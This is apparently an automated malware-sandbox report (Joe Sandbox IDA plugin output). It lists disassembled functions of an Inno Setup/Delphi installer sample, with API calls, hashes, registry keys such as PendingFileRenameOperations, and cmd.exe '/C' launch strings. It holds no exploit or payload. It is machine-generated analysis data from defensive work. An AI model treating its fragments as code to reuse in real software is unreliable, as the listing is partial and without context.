                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0042F58F
                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0042F597
                                                                                                                                                                                                                                  • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                                                                                                                                                                  • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$CreateFocus$ActiveClassRegisterShow
• String ID: TWindowDisabler-Window
• API String ID: 3167913817-1824977358
• Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
• Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
• Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
• Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
• Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
• Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
• Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
• Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
• RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
• GetCurrentThreadId.KERNEL32 ref: 00430971
• GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
• String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
• API String ID: 4130936913-2943970505
• Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
• Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
• Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
• Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
  • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
  • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
  • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
  • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
• String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
• API String ID: 854858120-615399546
• Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
• Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
• Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
• Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
• GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
• OemToCharA.USER32(?,?), ref: 0042375C
• CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Char$FileIconLoadLowerModuleName
• String ID: 2$MAINICON
• API String ID: 3935243913-3181700818
• Opcode ID: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
• Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
• Opcode Fuzzy Hash: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
• Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
• GetCurrentThreadId.KERNEL32 ref: 00418F79
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
  • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
  • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
  • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                                                                                                                                                    • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                                                                                                                                                    • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                                                                                                                                                    • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                                                                                                                                                    • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                                                                                                                                                    • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                                                                                                                                                                  • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                                                                                                                                                  • API String ID: 316262546-2767913252
                                                                                                                                                                                                                                  • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                                                                                                                                                  • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$Prop
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3887896539-0
                                                                                                                                                                                                                                  • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                                                                                                                                                  • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • WININIT.INI, xrefs: 004557E4
                                                                                                                                                                                                                                  • PendingFileRenameOperations2, xrefs: 00455784
                                                                                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 00455754
                                                                                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                                                                                                                                                  • API String ID: 47109696-2199428270
                                                                                                                                                                                                                                  • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                                                                                                                                                  • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
• GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: Created temporary directory: $\_setup64.tmp$_isetup
• API String ID: 1375471231-2952887711
• Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
• Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
• Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
• Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
Uniqueness

Uniqueness Score: -1.00%

APIs
• EnumWindows.USER32(00423A1C), ref: 00423AA8
• GetWindow.USER32(?,00000003), ref: 00423ABD
• GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
• SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$EnumLongWindows
• String ID: \AB
• API String ID: 4191631535-3948367934
• Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
• Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
• Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
• Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressDeleteHandleModuleProc
• String ID: RegDeleteKeyExA$advapi32.dll
• API String ID: 588496660-1846899949
• Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
• Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
• Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
• Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
Uniqueness

Uniqueness Score: -1.00%

Strings
• Need to restart Windows? %s, xrefs: 0046BE95
• PrepareToInstall failed: %s, xrefs: 0046BE6E
• NextButtonClick, xrefs: 0046BC4C
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID:
• String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
• API String ID: 0-2329492092
• Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
• Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
• Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
• Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
• SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ActiveChangeNotifyWindow
• String ID: $Need to restart Windows? %s
• API String ID: 1160245247-4200181552
• Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
• Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
